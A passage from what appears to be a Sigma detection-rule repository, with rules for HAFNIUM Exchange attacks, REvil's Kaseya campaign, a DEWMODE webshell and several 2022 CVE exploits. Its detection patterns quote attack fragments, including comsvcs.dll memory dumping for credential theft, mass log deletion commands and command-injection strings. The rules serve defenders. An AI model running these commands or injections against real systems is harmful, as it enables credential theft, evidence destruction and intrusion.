selection_opera_1:\n        Image|endswith: 'Opera_browser.exe'\n        ParentImage|endswith:\n            - '\\services.exe'\n            - '\\svchost.exe'\n    selection_opera_2:\n        Image|endswith: 'Users\\Public\\opera\\Opera_browser.exe'\n    selection_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin list shadows'\n            - 'Temp\\__output'\n    selection_makecab_1:\n        Image|endswith: '\\makecab.exe'\n        CommandLine|contains|all:\n            - 'inetpub\\wwwroot\\'\n            - '.dmp.zip'\n    selection_makecab_2:\n        Image|endswith: '\\makecab.exe'\n        CommandLine|contains:\n            - 'Microsoft\\Exchange Server\\'\n            - 'compressionmemory'\n            - '.gif'\n    selection_7zip:\n        CommandLine|contains|all:\n            - ' -t7z '\n            - 'C:\\Programdata\\pst'\n            - '\\it.zip'\n    selection_rundll32:\n        CommandLine|contains|all:\n            - '\\comsvcs.dll'\n            - 'Minidump'\n            - 'full '\n            - '\\inetpub\\wwwroot'\n    selection_other:\n        CommandLine|contains:\n            - 'Windows\\Temp\\xx.bat'\n            - 'Windows\\WwanSvcdcs'\n            - 'Windows\\Temp\\cw.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/HAFNIUM/web_exchange_exploitation_hafnium.yml",
    "content": "title: Exchange Exploitation Used by HAFNIUM\nid: 67bce556-312f-4c81-9162-c3c9ff2599b2\nstatus: test\ndescription: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.g0125\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/owa/auth/Current/themes/resources/'\n    selection_2:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/owa/auth/Current/'\n        cs-user-agent:\n            - 'DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)'\n            - 'facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)'\n            - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'\n            - 'Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)'\n            - 'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html'\n            - 'Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)'\n            - 'Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)'\n            - 'Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)'\n            - 'Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36'\n    selection_3:\n        cs-uri-query|contains: '/ecp/'\n        cs-method: 'POST'\n        cs-user-agent:\n            - 'ExchangeServicesClient/0.0.0.0'\n            - 'python-requests/2.19.1'\n            - 'python-requests/2.25.1'\n    selection_4:\n        cs-uri-query|contains:\n            - '/aspnet_client/'\n            - '/owa/'\n        cs-method: 'POST'\n        cs-user-agent:\n            - 'antSword/v2.1'\n            - 'Googlebot/2.1+(+http://www.googlebot.com/bot.html)'\n            - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'\n    selection_5:\n        cs-uri-query|contains:\n            - '/owa/auth/Current/'\n            - '/ecp/default.flt'\n            - '/ecp/main.css'\n        cs-method: 'POST'\n    selection_6:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/ecp/'\n            - '.js'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml",
    "content": "title: REvil Kaseya Incident Malware Patterns\nid: 5de632bc-7fbd-4c8a-944a-fce55c59eae5\nstatus: test\ndescription: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)\nreferences:\n    - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\n    - https://www.joesandbox.com/analysis/443736/0/html\n    - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\n    - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/\n    - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-03\nmodified: 2022-05-20\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.g0115\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'C:\\Windows\\cert.exe'\n            - 'del /q /f c:\\kworking\\agent.crt'\n            - 'Kaseya VSA Agent Hot-fix'\n            - '\\AppData\\Local\\Temp\\MsMpEng.exe'\n            - 'rmdir /s /q %SystemDrive%\\inetpub\\logs'\n            - 'del /s /q /f %SystemDrive%\\\\*.log'\n            - 'c:\\kworking1\\agent.exe'\n            - 'c:\\kworking1\\agent.crt'\n    selection2:\n        Image:\n            - 'C:\\Windows\\MsMpEng.exe'\n            - 'C:\\Windows\\cert.exe'\n            - 'C:\\kworking\\agent.exe'\n            - 'C:\\kworking1\\agent.exe'\n    selection3:\n        CommandLine|contains|all:\n            - 'del /s /q /f'\n            - 'WebPages\\Errors\\webErrorLog.txt'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml",
    "content": "title: APT PRIVATELOG Image Load Pattern\nid: 33a2d1dd-f3b0-40bd-8baf-7974468927cc\nstatus: test\ndescription: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances\nreferences:\n    - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-07\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith: '\\clfsw32.dll'\n    condition: selection\nfalsepositives:\n    - Rarely observed\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml",
    "content": "title: SOURGUM Actor Behaviours\nid: 7ba08e95-1e0b-40cd-9db5-b980555e42fd\nstatus: test\ndescription: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM\nreferences:\n    - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection\n    - https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\nauthor: MSTIC, FPT.EagleEye\ndate: 2021-06-15\nmodified: 2022-10-09\ntags:\n    - attack.t1546\n    - attack.t1546.015\n    - attack.persistence\n    - attack.privilege-escalation\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|contains:\n            - 'windows\\system32\\Physmem.sys'\n            - 'Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini'\n            - 'Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini'\n            - 'Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini'\n    registry_image:\n        Image|contains:\n            - 'windows\\system32\\filepath2'\n            - 'windows\\system32\\ime'\n        CommandLine|contains: 'reg add'\n    registry_key:\n        CommandLine|contains:\n            - 'HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32'\n            - 'HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32'\n    condition: selection or all of registry_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/UNC2546/web_unc2546_dewmode_php_webshell.yml",
    "content": "title: DEWMODE Webshell Access\nid: fdf96c90-42d5-4406-8a9c-14a2c9a016b5\nstatus: test\ndescription: Detects access to DEWMODE webshell as described in FIREEYE report\nreferences:\n    - https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-22\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains|all:\n            - '?dwn='\n            - '&fn='\n            - '.html?'\n    selection2:\n        cs-uri-query|contains|all:\n            - '&dwn='\n            - '?fn='\n            - '.html?'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml",
    "content": "title: Potential CVE-2023-21554 QueueJumper Exploitation\nid: 53207cc2-0745-4c19-bc72-80be1cc16b3f\nstatus: test\ndescription: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)\nreferences:\n    - https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-12\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - cve.2023-21554\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\Windows\\System32\\mqsvc.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21587/web_cve_2022_21587_oracle_ebs.yml",
    "content": "title: Potential CVE-2022-21587 Exploitation Attempt\nid: d033cb8a-8669-4a8e-a974-48d4185a8503\nstatus: test\ndescription: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.\nreferences:\n    - https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/\n    - https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis\n    - https://github.com/hieuminhnv/CVE-2022-21587-POC\n    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\nauthor: Isa Almannaei\ndate: 2023-02-13\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-21587\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains:\n            - '/OA_HTML/BneViewerXMLService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneUploaderService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneDownloadService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneOfflineLOVService?bne:uueupload=TRUE'\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21919/win_system_exploit_cve_2022_21919_or_cve_2021_34484.yml",
    "content": "title: Potential Exploitation of CVE-2022-21919 or CVE-2021-34484 for LPE\nid: 52a85084-6989-40c3-8f32-091e12e17692\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2022-21919 or CVE-2021-34484 leading to local privilege escalation via the User Profile Service.\n    During exploitation of this vulnerability, two logs (Provider_Name: Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 are created (EventID 1515 may generate many false positives).\n    Additionally, the directory \\Users\\TEMP may be created during exploitation. This behavior was observed on Windows Server 2008.\nreferences:\n    - https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html\nauthor: Cybex\ndate: 2022-08-16\nmodified: 2025-11-03\ntags:\n    - attack.execution\n    - detection.emerging-threats\n    - cve.2022-21919\n    - cve.2021-34484\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        EventID: 1511\n        Provider_Name: 'Microsoft-Windows-User Profiles Service'\n    condition: selection\nfalsepositives:\n    - Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-22954/proc_creation_win_exploit_cve_2022_22954_vmware_workspace_one_rce.yml",
    "content": "title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution\nid: 5660d8db-6e25-411f-b92f-094420168a5d\nstatus: test\ndescription: |\n    Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.\n    As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat \"prunsrv.exe\" process application.\nreferences:\n    - https://blog.morphisec.com/vmware-identity-manager-attack-backdoor\n    - https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC\nauthor: '@kostastsale'\ndate: 2022-04-25\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1059.006\n    - attack.t1190\n    - cve.2022-22954\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\prunsrv.exe'\n    selection_payload_pwsh:\n        Image|endswith: '\\powershell.exe'\n    selection_payload_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '/c powershell'\n    condition: selection_parent and 1 of selection_payload_*\nfalsepositives:\n    - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml",
    "content": "title: CVE-2022-24527 Microsoft Connected Cache LPE\nid: e0a41412-c69a-446f-8e6e-0e6d7483dad7\nstatus: test\ndescription: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache\nreferences:\n    - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-13\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059.001\n    - cve.2022-24527\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: 'WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1'\n    filter:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-26134/proc_creation_lnx_exploit_cve_2022_26134_atlassian_confluence.yml",
    "content": "title: Atlassian Confluence CVE-2022-26134\nid: 7fb14105-530e-4e2e-8cfb-99f7d8700b66\nrelated:\n    - id: 245f92e3-c4da-45f1-9070-bc552e06db11\n      type: derived\nstatus: test\ndescription: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-03\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - attack.t1059\n    - cve.2022-26134\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        # Monitor suspicious child processes spawned by Confluence\n        ParentImage|startswith: '/opt/atlassian/confluence/'\n        ParentImage|endswith: '/java'\n        CommandLine|contains:\n            - '/bin/sh'\n            - 'bash'\n            - 'dash'\n            - 'ksh'\n            - 'zsh'\n            - 'csh'\n            - 'fish'\n            - 'curl'\n            - 'wget'\n            - 'python'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml",
    "content": "title: Potential CVE-2022-26809 Exploitation Attempt\nid: a7cd7306-df8b-4398-b711-6f3e4935cf16\nstatus: test\ndescription: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809\n    - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html\n    - https://twitter.com/cyb3rops/status/1514217991034097664\n    - https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-13\nmodified: 2023-02-03\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1569.002\n    - cve.2022-26809\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\System32\\svchost.exe'\n        ParentCommandLine|contains: '-k RPCSS'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - Some cases in which the service spawned a werfault.exe process\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-27925/web_cve_2022_27925_exploit.yml",
    "content": "title: Zimbra Collaboration Suite Email Server Unauthenticated RCE\nid: dd218fb6-4d02-42dc-85f0-a0a376072efd\nstatus: test\ndescription: Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection\nreferences:\n    - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\n    - https://www.yang99.top/index.php/archives/82/\n    - https://github.com/vnhacker1337/CVE-2022-27925-PoC\nauthor: '@gott_cyber'\ndate: 2022-08-17\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-27925\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_servlet:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/service/extension/backup/mboximport\\?'\n        cs-uri-query|contains|all:\n            - 'account-name'\n            - 'ow'\n            - 'no-switch'\n            - 'append'\n        sc-status:\n            - 401\n            - 200\n    selection_shell:\n        cs-uri-query|contains: '/zimbraAdmin/'\n        cs-uri-query|endswith: '.jsp'\n        sc-status|contains: '200'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml",
    "content": "title: Potential CVE-2022-29072 Exploitation Attempt\nid: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n    7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\n    The command runs in a child process under the 7zFM.exe process.\nreferences:\n    - https://github.com/kagancapar/CVE-2022-29072\n    - https://twitter.com/kagancapar/status/1515219358234161153\nauthor: frack113, @kostastsale\ndate: 2022-04-17\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - cve.2022-29072\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\7zFM.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    filter_main_extensions_and_flags:\n        - CommandLine|contains:\n              - ' /c '\n              - ' /k '\n              - ' /r '\n        - CommandLine|endswith:\n              - '.bat'\n              - '.cmd'\n              - '.ps1'\n    filter_main_null:\n        CommandLine: null\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-29799/lnx_exploit_cve_2022_27999_cve_2022_27800.yml",
    "content": "title: Potential Nimbuspwn Exploit CVE-2022-29799 and CVE-2022-27800\nid: 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of Nimbuspwn vulnerabilities CVE-2022-29799 and CVE-2022-27800 in Linux systems.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/\n    - https://github.com/Immersive-Labs-Sec/nimbuspwn\nauthor: Bhabesh Raj\ndate: 2022-05-04\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\n    - cve.2022-29799\n    - cve.2022-27800\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        '|all':\n            - 'networkd-dispatcher'\n            - 'Error handling notification for interface'\n            - '../../'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-30190/registry_set_exploit_cve_2022_30190_msdt_follina.yml",
    "content": "title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)\nid: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3\nstatus: test\ndescription: Detects a registry value being set under the ms-msdt MSProtocol URI scheme key, which could be an attempt to exploit CVE-2022-30190.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\n    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nauthor: Sittikorn S\ndate: 2020-05-31\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1221\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|startswith: 'HKCR\\ms-msdt\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-31656/web_cve_2022_31656_auth_bypass.yml",
    "content": "title: CVE-2022-31656 VMware Workspace ONE Access Auth Bypass\nid: fcf1101d-07c9-49b2-ad81-7e421ff96d80\nstatus: test\ndescription: |\n    Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\n    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\n    A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\nreferences:\n    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-31656\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/SAAS/t/_/;/'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-31659/web_cve_2022_31659_vmware_rce.yml",
    "content": "title: CVE-2022-31659 VMware Workspace ONE Access RCE\nid: efdb2003-a922-48aa-8f37-8b80021a9706\nstatus: test\ndescription: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659\nreferences:\n    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-31659\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\n    - Legitimate access to the URI\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-33891/proc_creation_lnx_exploit_cve_2022_33891_spark_shell_command_injection.yml",
    "content": "title: Apache Spark Shell Command Injection - ProcessCreation\nid: c8a5f584-cdc8-42cc-8cce-0398e4265de3\nstatus: test\ndescription: Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command line perspective\nreferences:\n    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py\n    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\n    - https://github.com/apache/spark/pull/36315/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-33891\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        # Linux paths use forward slashes; a parent image ending in '/bash'\n        ParentImage|endswith: '/bash'\n        CommandLine|contains:\n            - 'id -Gn `'\n            - \"id -Gn '\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-33891/web_cve_2022_33891_spark_shell_command_injection.yml",
    "content": "title: Apache Spark Shell Command Injection - Weblogs\nid: 1a9a04fd-02d1-465c-abad-d733fd409f9c\nstatus: test\ndescription: Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a web logs perspective\nreferences:\n    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py\n    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\n    - https://github.com/apache/spark/pull/36315/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-33891\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '?doAs=`'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-36804/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml",
    "content": "title: Atlassian Bitbucket Command Injection Via Archive API\nid: 65c0a0ab-d675-4441-bd6b-d3db226a2685\nstatus: test\ndescription: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804\nreferences:\n    - https://twitter.com/_0xf4n9x_/status/1572052954538192901\n    - https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/\n    - https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html\n    - https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-36804\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - '/rest/api/latest/projects/'\n            - 'prefix='\n            - '%00--exec'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-37966/win_system_exploit_cve_2022_37966_kdcsvc_rc4_downgrade.yml",
